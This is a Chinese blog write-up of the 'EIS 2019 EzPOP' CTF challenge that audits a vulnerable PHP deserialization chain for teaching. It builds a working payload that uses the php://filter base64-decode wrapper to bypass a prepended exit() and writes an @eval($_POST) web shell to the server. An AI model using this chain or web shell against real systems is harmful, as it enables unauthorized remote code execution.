EIS2019-EzPOP

最新推荐文章于 2024-07-27 13:59:36 发布
最新推荐文章于 2024-07-27 13:59:36 发布
阅读量1.4k 收藏 8
点赞数 9
分类专栏: PHP反序列化 文章标签: python php PHP反序列化 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gd_9988/article/details/106111902
版权

「EIS 2019」EzPOP

做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
首先看源代码:

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

源代码对于大佬来说看懂很简单,但对于我这种小白来讲确实是难。又比较长,不过咱也不着急对吧,一点点来审计,总能审计完的
首先看到A类
定义了三个被保护的变量,也就很明确了只能在本类访问,好的,接下来看__construct方法,差不多相当于是初始化
看到cleanContents函数
这里将两个函数的定义和用法写出来,以便于理解

array_filp()反转数组中所有的键以及它们关联的值
array_intersect_key()比较两个数组的键名,并返回交集

这里的object函数可控
好,继续看getForStorage函数

public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

调用了cleanContents函数
传入了cache变量,而我们这里发现并没有cache这个变量,所以这个需要后续把变量定义传值(可控),可以看到返回值被json_encode(将数值转换成json数据存储格式。)
我们发现这里的complete变量也可控
ok,继续看到save函数

public function save() {
    $contents = $this->getForStorage();
    $this->store->set($this->key, $contents, $this->expire);
    }

这里调用了getForStorage函数
A类中的store变量调用了set函数,但?好像A类并没有这个set函数,去B类看看,果真有一个set函数,好,别心急最后还有个__destruct方法

public function __destruct() {
    if (!$this->autosave) {
        $this->save();
        }
    }

要想调用save函数,这里的autosave就得是flase,false false=true
接下来我们看到B类
getExpireTime函数返回 int参数,也就相当于是格式化吧

protected functiongetExpireTime($expire): int {
    return (int) $expire;
    }

getCacheKey函数拼接字符串

public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }

发现这里的options[‘prefix’]可控
接着是serialize函数

protected function serialize($data): string {
    if (is_numeric($data)) {
        return (string) $data;
        }
    $serialize = $this->options['serialize'];
    return $serialize($data);
    }

此serialize函数非彼serialize
我们看到如果传入的data参数将会格式化为string类型
可以看到$serialize变量可控
最后重头戏来了
看到set函数

public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }

        return false;
    }

is_null()判断参数是否为NULL

很明显这里是NULL,所以这个变量我们可控
expire变量调用了getExpireTime这个函数,格式化为int类型
filename变量调用了getCacheKey这个函数,所以filename这个变量最终的值是和options[‘prefix’]拼接而成,然后根据filename创建目录(这个暂时不用关心)
接着看到data变量调用了serialize函数,正好这个函数需要传入一个值
看到

if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

这里我们并不需要压缩,所以使options[‘data_compress’]=false即可绕过
最后这个地方data数据与<?php exit();?>连接,也就是说即使我们传上了木马也无济于事,会直接退出,也就是PHP中的死亡exit(),但是也不是没有绕过的方法,这里引用@p神的一篇文章又是膜拜p神的一天由于<、?、()、;、>、\n都不是base64编码的范围,所以base64解码的时候会自动将其忽略,所以解码之后就剩phpexit了,但是呢base64算法解码时是4个字节一组,所以我们还需要在前面加个字符
回归正文
看到我们这个题目

<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n

中间部分sprintf('%012d', $expire)代表12个字节
<?php\n// \n exit();?>\n有20个字节
这里我们需要构造$expire = [0-9];
在这个范围内这一部分都是12个字节。
但是符合base64解码的字符只有9个字节(php//exit)故我们需要再加3个字节(24个字节4的倍数)
我们可以使用php伪协议来绕过

php://filter/write=convert.base64-decode/resource=

最后一个file_put_contents很明显的预示了此题需要写shell
我们几乎已经将所有的代码都熟悉了一遍,那么,进入正题,开始构造思路
首先file_put_contents函数有两个参数filename和data,所以一个是写入shell的路径和shell的数据
data与死亡exit进行连接(可绕过)
filename参数是options[‘prefix’]和$name进行拼接的结果,而这里的**$name是形参**,所以这个$name是A类的key变量,是由save函数传递过来的
由于options[‘prefix’]可控
所以这里我们可以使

options['prefix']="php://filter/write=convert.base64-decode/resource=";
key="webshell.php"; //$name

好的,现在文件名已经构造好了,那么现在得构造shell的内容,也就是data变量,而data变量被serialize函数处理,是通过set函数中的$value变量传递过来的,而$value变量是A类中的**$contents变量传递**过来的,所以我们可以构造cache这个变量为数组,然后经过两个函数的处理,我们可以控制complete这个变量为shell的数据,经过json_encode这个函数的处理之后,由于json格式的字符都不满足base64编码的要求,所以我们可以将数据进行base64编码绕过,也就是

A->complete=base64_encode('xxx',base64_encode('<?php @eval($_POST["ro4lsc"]);?>'))

首先将shellcode进行base64编码使得base64decode的时候不会影响其内容,然后再次进行base64_encode是为了绕过死亡exit,由于解码之后只剩21个字符,所以这里需要自己添加三个字符,使得前面有24个字符可以base64正常解码不影响后面shellcode的执行
那么到这里data的内容也构造好了,可是我们发现
使用php伪协议只解了一次编码,而我们这里经历了两次base64编码
前面提到了一个serialize函数

   protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }
        $serialize = $this->options['serialize'];
        return $serialize($data);
    }

可以看到返回值是$serialize,也就是说这里我们可以让这个变量为base64_decode函数对data变量进行解码。
看到

public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

这里我们还需要传入一个cache为数组内容为空

A->cache=array();

好,现在我们可以看A类
save函数这个地方的利用很重要,它调用了getForStorage函数,后面的$this->store这个地方得是对象B才能调用set函数。
所以

A->store = new B();

然后一个大概的调用过程:

A::__destruct->save()->getForStorage()->cleanStorage()
B::save()->set()->getExpireTime()getCacheKey()+serialize()->file_put_contents写入shell->getshell

一个大概的思路:

构造文件名:
$filename->options['prefix'].$name
$name->A::$key
构造payload:
$data->$value->A::$contents->$complete和$cleaned

payload:

<?php
class A{
protected $store;
protected $key;
protected $expire;

public function __construct()
{
    $this->cache = array();
    $this->complete = base64_encode("xxx".base64_encode('<?php @eval($_POST["ro4lsc"]);?>'));
    $this->key = "shell.php";
    $this->store = new B();
    $this->autosave = false;
    $this->expire = 0;
}


}
class B{
    public $options = array();
    function __construct()
    {
        $this->options['serialize'] = 'base64_decode';
        $this->options['prefix'] = 'php://filter/write=convert.base64-decode/resource=';
        $this->options['data_compress'] = false;
    }
}
echo urlencode(serialize(new A()));

最后使用?data=传递参数,它会在当前工作目录创建一个shell.php,菜刀orAntSword连接getshell。

后言

代码审计固然辛苦,但深究其原理还是很有意思的,加油!

Rocl5
关注
专栏目录
BUUCTF__[EIS 2019]EzPOP_题解
风过江南乱的博客
04-28 1028
BUUCTF__[EIS 2019]EzPOP_题解 php反序列化
[EIS 2019]EzPOP
qq_43801002的博客
05-15 1503
#题目: <?php error_reporting(0); class A{ protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $sto
[网鼎杯 2020 朱雀组]Nmap(详细解读版)
最新发布
weixin_73399382的博客
07-27 1011
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
X60008EIS8-50的技术参数
12-12
产品型号:X60008EIS8-50输入电压(V):5.1~9.0输出电压(V):5初始精度:±5.0mV温度漂移:20ppm/℃工作电流:500nA封装/温度(℃):SOIC8/-40~85价格/1片(套):¥12.98 
论坛社区EIS 1.02-eisv1.0.2.rar
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...【项目质量】:所有源码都经过严格测试,可以直接...
JCA Resource Adapter for 1C EIS System-开源
04-25
Java连接适配器(JCA,Java Connector Architecture)是一种用于在Java应用程序中集成企业级信息系统(EIS)的标准。在本例中,"JCA Resource Adapter for 1C EIS System" 是一个专为1C企业信息系统设计的开源组件,...
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 388
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 366
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
序列化与反序列化——[EIS 2019]EzPOP
LSYZWF的博客
11-06 363
文章目录题目解答 题目 链接:https://buuoj.cn/challenges#[EIS%202019]EzPOP 解答 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 263
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[EIS 2019]EzPOP-PHP代码审计学习
cjdgg的博客
03-09 301
[EIS 2019]EzPOP-PHP代码审计学习 作为一个不太聪明的WEB安全菜鸟,代码审计一直不咋地,正好遇到一道题,记录一下学习过程 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) {
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 1137
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
EIS 2019——misc1
pigredfive的博客
11-28 554
题目截图: 把txt文件下载下来。 解题过程: 这道题应该是misc的签到题,理论上不会太难。 我们先用txt打开,看一下: 乱码,我们需要换种方式打开。这时可以考虑尝试用word打开。因为word对于初始文本编码下多数字体不常见时会弹出换字体编码窗口。如下: Windows简体中文文本编码出现乱码,我们可以考虑换其他编码: 可见,Ext Alpha就是这个misc txt文本的编码格式。...
[2019EIS高校运维赛]ezupload
xlcvv的博客
04-17 3156
ezupload ezbypass 一、ezupload 先来一个之前的思路 随意输入username和oassword: 又试了一下万能密码,也是login failed,那就想到了sql注入,抓包另存为txt文件: 用username做注入点,失败。看了大佬的wp后才知道,网页源码下有个小提示: 下载下来,是个swp文件: swp文件是文件在编辑的过程中,由于不正当结束,会存在修...
研祥EIS-2202工业级服务器技术规格与安全指南
"研祥EIS-2202是一款工业级的2U上架式服务器,采用Intel IA架构,搭载高性能的四核XEON处理器,适用于数据密集型应用,如海量数据处理、Web服务器、邮件服务器、电子商务服务器和后台数据库。这款服务器专为中小型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值